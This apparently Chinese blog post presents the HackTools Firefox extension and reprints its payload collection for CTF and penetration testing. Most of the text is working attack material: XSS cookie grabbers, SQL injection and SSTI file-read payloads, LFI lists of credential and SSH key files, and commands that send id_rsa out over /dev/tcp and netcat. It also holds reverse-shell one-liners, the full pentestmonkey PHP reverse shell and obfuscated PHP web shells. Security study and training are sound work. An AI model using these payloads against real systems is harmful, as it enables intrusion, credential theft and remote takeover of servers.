猫宁~~~

firefox插件hacktools地址:

https://addons.mozilla.org/zh-CN/firefox/addon/hacktools/

HackTools由Ludovic Coulon和Riadh BoUCHAHOUA创建。

这是他们插件制作的初衷:

我们是两个对计算机安全非常感兴趣的学生,这个想法是在我们的CTF培训期间出现的,我们注意到我们经常使用相同的工具(绘制一个shell,用php反向shell,Base64编码等等),这就是当我们想到将大多数工具和有效负载组合在一个地方的想法时,一个简单的Web应用程序就可以完成这项工作,但是来回移动相当令人沮丧,这就是为什么我们想直接在浏览器中实现一个扩展

由此,我们可以知道,一个渗透测试工具的目的,是提高生产力,有的时候,一种聚合也是一种创新。

1~xss相关payload

Data grabber for XSS
Obtains the administrator cookie or sensitive access token, the following payload will send it to a controlled page.

<script>document.location='http://localhost/XSS/grabber.php?c='+document.cookie</script>
<script>document.location='http://localhost/XSS/grabber.php?c='+localStorage.getItem('access_token')</script>
<script>new Image().src='http://localhost/cookie.php?c='+document.cookie;</script>
<script>new Image().src='http://localhost/cookie.php?c='+localStorage.getItem('access_token');</script>

XSS in HTML/Applications

Basic Payload

<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert("XSS")</script>
"><script>alert(String.fromCharCode(88,83,83))</script>

Img tag payload

<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert("XSS");>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

XSS in Markdown

[a](javascript:prompt(document.cookie))
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

XSS in SVG (short)

<svg xmlns='http://www.w3.org/2000/svg' onload='alert(document.domain)'/>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>
<svg><foreignObject><![CDATA[</foreignObject><script>alert(2)</script>]]></svg>
<svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>

Bypass word blacklist with code evaluation

eval('ale'+'rt(0)');
Function('ale'+'rt(1)')();
new Function`alert`6``;
setTimeout('ale'+'rt(2)');
setInterval('ale'+'rt(10)');
Set.constructor('ale'+'rt(13)')();
Set.constructor`alert(14)```;

2~sql注入payload

Generic SQL Injection Payloads

' or '
-- or #
' OR '1
' OR 1 -- - 
OR "" = "
" OR 1 = 1 -- -"
' OR '' = '
'='
'LIKE'
'=0--+
OR 1=1
' OR 'x'='x
' AND id IS NULL; --
'''''''''''''UNION SELECT '2

Time-Based

,(select * from (select(sleep(10)))a)
%2c(select%20*%20from%20(select(sleep(10)))a)
';WAITFOR DELAY '0:0:30'--

Generic Error Based Payloads

OR 1=1
OR 1=1#
OR x=y#
OR 1=1--
OR x=x--
OR 3409=3409 AND ('pytW' LIKE 'pytW
HAVING 1=1
HAVING 1=1#
HAVING 1=0--
AND 1=1--
AND 1=1 AND '%'='
WHERE 1=1 AND 1=0--
%' AND 8310=8310 AND '%'='

Authentication Based Payloads

' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
or true--
" or true--
' or true--
") or true--
') or true--
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/

Order by and UNION Based Payloads

1' ORDER BY 1--+
1' ORDER BY 2--+
1' ORDER BY 3--+
1' ORDER BY 1,2--+
1' ORDER BY 1,2,3--+
1' GROUP BY 1,2,--+
1' GROUP BY 1,2,3--+
' GROUP BY columnnames having 1=1 --
-1' UNION SELECT 1,2,3--+
' UNION SELECT sum(columnname ) from tablename --
-1 UNION SELECT 1 INTO @,@
-1 UNION SELECT 1 INTO @,@,@
1 AND (SELECT * FROM Users) = 1
' AND MID(VERSION(),1,1) = '5';
' and 1 in (select min(name) from sysobjects where xtype = 'U' and name > '.') --

3~Template Injections (SSTI),模板注入

Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages

Jinja2 ( Flask / Django )

File reading

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}

 
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }}

Write into a file

{{ ''.__class__.__mro__[2].__subclasses__()[40]('/var/www/html/myflaskapp/hello.txt', 'w').write('Hello here !') }}

 

4~LFI,本地文件包含

LFI stands for Local File Includes - it’s a file local inclusion vulnerability that allows an attacker to include files that exist on the target web server.
Typically this is exploited by abusing dynamic file inclusion mechanisms that don’t sanitize user input.

Directory traversal

foo.php?file=../../../../../../../etc/passwd

PHP Wrapper php://file

/example1.php?page=expect://ls

PHP Wrapper php://filter

/example1.php?page=php://filter/convert.base64-encode/resource=../../../../../etc/passwd

Useful LFI files

Linux

/etc/passwd
/etc/shadow
/etc/issue
/etc/group
/etc/hostname
/etc/ssh/ssh_config
/etc/ssh/sshd_config
/root/.ssh/id_rsa
/root/.ssh/authorized_keys
/home/user/.ssh/authorized_keys
/home/user/.ssh/id_rsa
/proc/[0-9]*/fd/[0-9]*
/proc/mounts
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db

Apache

/etc/apache2/apache2.conf
/usr/local/etc/apache2/httpd.conf
/etc/httpd/conf/httpd.conf
Red Hat/CentOS/Fedora Linux -> /var/log/httpd/access_log
Debian/Ubuntu -> /var/log/apache2/access.log
FreeBSD -> /var/log/httpd-access.log
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/apache2/access.log
/var/log/apache/error.log

MySQL

/var/lib/mysql/mysql/user.frm
/var/lib/mysql/mysql/user.MYD
/var/lib/mysql/mysql/user.MYI

Windows

/boot.ini
/autoexec.bat
/windows/system32/drivers/etc/hosts
/windows/repair/SAM
/windows/panther/unattended.xml
/windows/panther/unattend/unattended.xml
/windows/system32/license.rtf
/windows/system32/eula.txt
 
5~File Transfer,文件传递

Bash Upload

# Upload file over HTTP (require HTTP service running on the attacker machine)

bash -c 'echo -e "POST / HTTP/0.9 $(<id_rsa)" > /dev/tcp/10.10.164.167/1337'

# Exfiltrate file over TCP# Listen with Netcat on port 1337 + output redirection

nc -l -p 1337 > data

bash -c 'cat id_rsa > /dev/tcp/10.10.164.167/1337'

Bash Download

# Send via netcat

nc -l -p 1337 < id_rsa

# Download file on the other machine

bash -c 'cat < /dev/tcp/10.10.164.167/1337 > id_rsa'

Netcat

# Upload payload

nc -lnvp 1337
nc 10.10.164.167 1337 < id_rsa

# Download

nc 10.10.164.167 1337 < id_rsa
nc -lnvp 1337 > file_saved

Python

# Python3 HTTP Server

python3 -m http.server 1337

# Python2 HTTP Server

python -m SimpleHTTPServer 1337

SCP

# Upload from local host to remote computer

scp id_rsa username@10.10.164.167:~/destination -P 1337

# Download from remote computer

scp user@10.10.164.167:~/path_to_file file_saved -P 1337

 
6~Useful Linux command for your Penetration Testing

SUID Commands

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;
find / -type f -name '*.txt' 2>/dev/null

What version of the system ?

cat /etc/issue
cat /etc/*-release 
cat /etc/lsb-release
cat /etc/redhat-release

What is its kernel version ?

cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz

What is the environment variables ?

cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Service settings, there is any wrong allocation?

cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/

Is there any cron jobs ?

crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Other users host communication with the system ?

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last

How to port forwarding ?

# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7
# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
# mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpi...
backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc
localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)

TAR wildcard cronjob privilege escalation

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your ip> 1234 >/tmp/f" > shell.sh
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"
 
7~TTY Spawn Shell
 
Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.

Python spawn shell

python -c 'import pty; pty.spawn("/bin/sh")'

Fully Interactive TTY

All the steps to stabilize your shell

# In the reverse shell
python -c 'import pty; pty.spawn("/bin/sh")'
ctrl+z
# Attacker Machine
stty raw -echo
fg
# In the reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows [num] columns [cols]

OS system spawn shell

echo os.system("/bin/bash")

Bash spawn shell

/bin/sh -i

Perl spawn shell

perl —e 'exec "/bin/sh";'

Python spawn shell

ruby: exec "/bin/sh"

Lua spawn shell

lua: os.execute("/bin/sh")

IRB spawn shell

exec "/bin/sh"

VI spawn shell

:!bash

VI(2) spawn shell

:set shell=/bin/bash:shell

Nmap spawn shell

!sh

 

8~PHP Reverse Shell

Attackers who successfully exploit a remote command execution vulnerability can use a reverse shell to obtain an interactive shell session on the target machine and continue their attack.

Pentestmonkey's reverse shell

This script will make an outbound TCP connection to a hardcoded IP and port
  <?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net set_time_limit (0);
$VERSION = "1.0";
$ip = ''; // You have changed this
$port = ; // And this
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0; //
// Daemonise ourself if possible to avoid zombies later
// // pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork(); if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
} if ($pid) {
exit(0); // Parent exits
} // Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
} $daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
} // Change to a safe directory
chdir("/"); // Remove any umask we inherited
umask(0); //
// Do the reverse shell...
// // Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
} // Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
} // Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
} // Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
} // Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); // If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
} // If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
} // If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
} fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process); // Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string
";
}
} ?>

Basic RCE

When you have successfully uploaded your payload, just put your commands after the variable ?cmd= (ex: ?cmd=ls -la")
<?php system($_GET["cmd"]);?

Obfuscate PHP Web Shell

<?=`$_GET[0]`?> 

Usage : http://target.com/path/to/shell.php?0=command

 

<?=`$_POST[0]`?>

Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"
 
<?=`{$_REQUEST['_']}`?>
Usage :
- http://target.com/path/to/shell.php?_=command
- curl -X POST http://target.com/path/to/shell.php -d "_=command" '
 
<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
Usage :
- http://target.com/path/to/shell.php?0=command
 
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
Usage :
- http://target.com/path/to/shell.php?_=function&__=argument
- http://target.com/path/to/shell.php?_=system&__=ls

9~Reverse shell

A reverse shell is a shell session established on a connection that is initiated from a remote machine, not from the local host.

bash -c 'exec bash -i &>/dev/tcp/192.168.100.100/100 <&1'

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.100.100 100 >/tmp/f

php -r '$sock=fsockopen(getenv("192.168.100.100"),getenv("100"));exec("/bin/sh -i <&3 >&3 2>&3");'

perl -e 'use Socket;$i="$ENV{192.168.100.100}";$p=$ENV{100};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python -c 'import sys,socket,os,pty;s=socket.socket() s.connect((os.getenv("192.168.100.100"),int(os.getenv("100")))) [os.dup2(s.fileno(),fd) for fd in (0,1,2)] pty.spawn("/bin/sh")'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["192.168.100.100"],ENV["100"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

TF=$(mktemp -u); mkfifo $TF && telnet 192.168.100.100 100 0<$TF | /bin/sh 1>$TF

over~~~

PJzhang:Firefox渗透测试插件HackTools样例的更多相关文章

  1. 34款Firefox渗透测试插件工具

    工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件,其中包含渗透测试.信息收集.代理.加密解密等功能. 1:Firebug Firefox的 ...

  2. 34款Firefox渗透测试插件

    1:Firebug Firefox的 五星级强力推荐插件之一,不许要多解释 2:User Agent Switcher 改变客户端的User Agent的一款插件 3:Hackbar 攻城师必备工具, ...

  3. Firefox渗透测试黑客插件集

    前天看S哥用Firefox的hackbar进行手动注入进行渗透,觉得直接运用浏览器的插件进行渗透测试有很多优点,既可以直接在前端进行注入等操作,也可以省却了寻找各种工具的麻烦.前端还是最直接的!于是这 ...

  4. C++的性能C#的产能?! - .Net Native 系列《三》:.NET Native部署测试方案及样例

    之前一文<c++的性能, c#的产能?!鱼和熊掌可以兼得,.NET NATIVE初窥> 获得很多朋友支持和鼓励,也更让我坚定做这项技术的推广者,希望能让更多的朋友了解这项技术,于是先从官方 ...

  5. PJzhang:漏洞渗透测试框架“天使之剑(AngelSword)”

    猫宁!!! 参考链接: www.phpinfo.cc/?post=42 https://www.freebuf.com/sectool/149883.html 同事介绍了一款渗透测试框架AngelSw ...

  6. docker搭建一个渗透测试环境 bwapp为例

    bwapp是一个渗透测试靶场,他其中中含有100多个Web漏洞  基本涵盖了所有主要的已知Web漏洞,包括OWASP Top 10的各种 首先要去搜索一下  看一下有哪些镜像可以下载    docke ...

  7. 18个扩展让你的Firefox成为渗透测试工具

    Firefox是一个出自Mozilla组织的流行的web浏览器.Firefox的流行并不仅仅是因为它是一个好的浏览器,而是因为它能够支持插件进而加强它自身的功能.Mozilla有一个插件站点,在那里面 ...

  8. Grunt经常使用插件及演示样例说明

    下述给出了经常使用Grunt插件,并列举了部分插件演示样例: 插件名称 说明 Github地址 grunt-contrib-clean 清空文件和目录 https://github.com/grunt ...

  9. firefox渗透师必备的利器

    工欲善必先利其器,firefox一直是各位渗透师必备的利器,小编这里推荐34款firefox渗透测试辅助插件,其中包含渗透测试.信息收集.代理.加密解密等功能. 1:Firebug Firefox的 ...

随机推荐

  1. selenium+python3+pycharm

    当使用selenium实现元素定位时,运行: 元素定位,常用8大方法.具体百度 在此以id定位进行解释 #from selenium import webdriver # driver=webdriv ...

  2. React和Vue的异同

    Vue和React是时下比较受欢迎的三巨头之二,对Angular不慎了解,就不在赘述. React是由Facebook开发的一个js ui框架,其最大的变化就是VirtualDOM和新语法JSX vu ...

  3. Linux中逻辑卷(LV)的创建、增大和减小

    首先说一下在缩小逻辑卷的时候要注意的问题:第一步使用resize2fs命令更改文件系统的容量:第二步使用lvreduce命令减小逻辑卷的容量.这两个顺序千万不要搞反了,而且要保证缩减后的逻辑卷容量大于 ...

  4. php中用面向对象的思想编写mysql数据库操作类

    最近刚入门完mysql,正好学了一阵子php就想着如何把mysql的表信息用php打印页面上.现在就把代码贴出来,以便小伙伴们参考. 先是建立mysql连接: /*建立连接*/ class datab ...

  5. SSM获取SqlSessionFactory

    1.实现类获取session //根据id 修改阈值 public int altThers(threshold threshold) { SqlSessionFactoryBuilder build ...

  6. Docker实战(7):Docker无日志(无*-json.log文件)

    出现这种情况基本都是docker 版本太旧,我的处理方案就是将docker 版本升级到最新,然后重新docker run 一遍就会有了.注意:docker 升级后,原来images,容器会出现一些小问 ...

  7. 利用adb查看手机设备ip和连接手机的两种方式

    电脑安装adb(查看菜鸟adb教程) [cmd]->输入adb devices (设置了path,否则需要 ./路径/adb devices)如图: 查看ip两种方法(可能有更多,目前我还没看到 ...

  8. Python接口自动化测试01

    1)环境准备: 接口测试的方式有很多,比如可以用工具(jmeter,postman)之类,也可以自己写代码进行接口测试,工具的使用相对来说都比较简单,重点是要搞清楚项目接口的协议是什么,然后有针对性的 ...

  9. 网络爬虫:利用selenium,pyquery库抓取并处理京东上的图片并存储到使用mongdb数据库进行存储

    一,环境的搭建已经简单的工具介绍 1.selenium,一个用于Web应用程序测试的工具.其特点是直接运行在浏览器中,就像真正的用户在操作一样.新版本selenium2集成了 Selenium 1.0 ...

  10. 堆的源码与应用:堆排序、优先队列、TopK问题

    1.堆 堆(Heap))是一种重要的数据结构,是实现优先队列(Priority Queues)首选的数据结构.由于堆有很多种变体,包括二项式堆.斐波那契堆等,但是这里只考虑最常见的就是二叉堆(以下简称 ...